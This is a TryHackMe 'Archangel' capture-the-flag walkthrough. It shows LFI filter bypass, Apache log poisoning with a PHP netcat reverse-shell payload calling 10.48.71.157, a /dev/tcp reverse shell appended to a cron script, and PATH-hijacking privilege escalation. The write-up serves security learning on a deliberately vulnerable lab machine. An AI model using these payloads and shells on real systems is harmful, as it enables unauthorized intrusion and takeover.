July 1, 2026
Archangel TryHackMe Walkthrough | LFI, Log Poisoning & Linux Privilege Escalation Explained
Hello everyone,
By TibeRius_12
5 min read
My name is TibeRius_12. Today we will be covering another THM room named Archangel.
The main objective of this room is to exploit a web application vulnerability and perform privilege escalation. The challenge is divided into 3 parts: 1. boot up the machine, 2. Get a shell, and 3. root the machine.
- Enumeration
After booting up the machine, the first step is to enumerate all services running on the target VM using nmap.
nmap -sV
- sV — Determining all services running on the target machine
Since the HTTP service was exposed, I started discovering the HTTP service tool using gobuster.
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://
- dir — Directory
- -w — specifying wordlists
- -u — URL of target website
I saw /Flags directory, so I opened it in Firefox in the hope of getting the flag. And my reaction was "AHH! I got rickrolled😬"
Not losing hope, I traversed all the other directories in search of a flag, but I was disappointed. Interestingly, I noticed a company name on the index page. And that was the answer to the first question.
- Question-1 — Find a different hostname
I added that to /etc/hosts file of my attack box. I browsed the website again using that name followed by ".thm" and I found another flag.
- Question-2 — Find Flag 1
So I ran gobuster again to see if there were any new files or directories listed. Same command as above. And found robots.txt, so there will be some webpage that is disallowed.
3. Gaining access
- Question-3 — Look for a page under development
Moving on, I reached the following page where I have to click on a button that will redirect me to another page. Analyzing the URL carefully, I found that the webpage might be vulnerable to an LFI vulnerability.
To read about LFI vulnerability, you can visit this article https://www.invicti.com/learn/local-file-inclusion-lfi
Trying the method "../" it gave me an error: "Sorry, method not allowed". Inspecting the page, I found that there are 2 filters:
- The URL must contain /var/www/development_testing/
- The URL should not contain "../.."
So, I modified the URL by adding "..//". As Linux considers "../" & "..//" as the same. So the URL was
- http://.thm/.php?view=/var/www/development_testing/..//..//..//..//etc/passwd
Modifying the URL, I tried to access /var/log/apache2/access.log file to see what details are recorded.
I tried to execute the command through its URL, but it didn't work. So I tried sending a payload using User-Agent.
- &1|nc 10.48.71.157 1234 >/tmp/f') ?>
And after a few tries, I received a connection on my local attack box.
- nc -nlvp 1234
- -n — Prevents DNS lookups, speeding up connections.
- -l — Tells Netcat to listen for incoming connections rather than initiating one.
- -v — Enables verbose output so you can see details when a connection is made.
- -p — Specifies the exact port to listen on
As I knew that there is Archangel named user(When testing LFI), I saw the permissions of /home/archangel user, where read permission is allowed to other users & groups. So I opened user.txt file, which contained the flag.
- Question-4 — Find Flag 2
- Question-5 — Get a shell and find the user flag
4. Horizontal Privilege Escalation
- Question-6 — Get User 2 flag
We don't have any password, hash, or password file, but we have to perform horizontal privilege escalation. So I was exploring the target machine, where I saw that there is a script that runs at an equal interval, and the user was archangel. The contents of that script were "#!/bin/bash echo"hello world >> /opt/backupfiles/helloworld.txt"".
At this point I attempted to start a reverse shell using the following command.
- echo 'sh -i >& /dev/tcp/10.48.71.157/2234 0>&1' >> helloworld.sh
And we got the netcat reverse shell on port 2234 where the flag was in user2.txt
- nc -nlvp 2234
5. Vertical Privilege Escalation
Root the machine and find the root flag
Vertical privilege escalation is a bit tricky because it relies on how Linux locates executable files. When a program executes a command such as cp without specifying its full path (for example, /bin/cp), Linux searches for that executable in the directories listed in the PATH environment variable, from left to right.
If an attacker can place a malicious executable named cp in a directory that appears earlier in PATH, and a vulnerable SUID program invokes cp without using an absolute path, Linux will execute the attacker's cp instead of the legitimate one. Since the SUID program is running with elevated privileges, the malicious executable may also run with those privileges, resulting in privilege escalation.
This was the challenge — Archangel.
- Never trust input validation alone. Weak filtering allowed a Local File Inclusion (LFI) vulnerability to be bypassed using directory traversal techniques.
- Log poisoning can transform an LFI into Remote Code Execution (RCE). Injecting PHP code into the Apache access log and including it through the vulnerable parameter resulted in a reverse shell.
- Post-exploitation requires thorough enumeration. Exploring cron jobs, file permissions, and scheduled scripts uncovered an opportunity for horizontal privilege escalation.
- Misconfigured executable paths can lead to privilege escalation. A SUID binary that relied on the
PATHenvironment variable enabled PATH hijacking and ultimately root access. - Small misconfigurations rarely exist in isolation. Individually, each weakness appeared minor, but chaining them together resulted in complete system compromise.
Hope you like the walkthrough. I'll be covering more challenges soon.
Till then, happy hacking.😉
About the Author Hi, I'm TibeRius_12, a master's student in Cybersecurity and an aspiring penetration tester. I document my journey through TryHackMe labs, Active Directory, web security, and practical VAPT methodologies. If you enjoy hands-on cybersecurity content, feel free to follow me for future write-ups.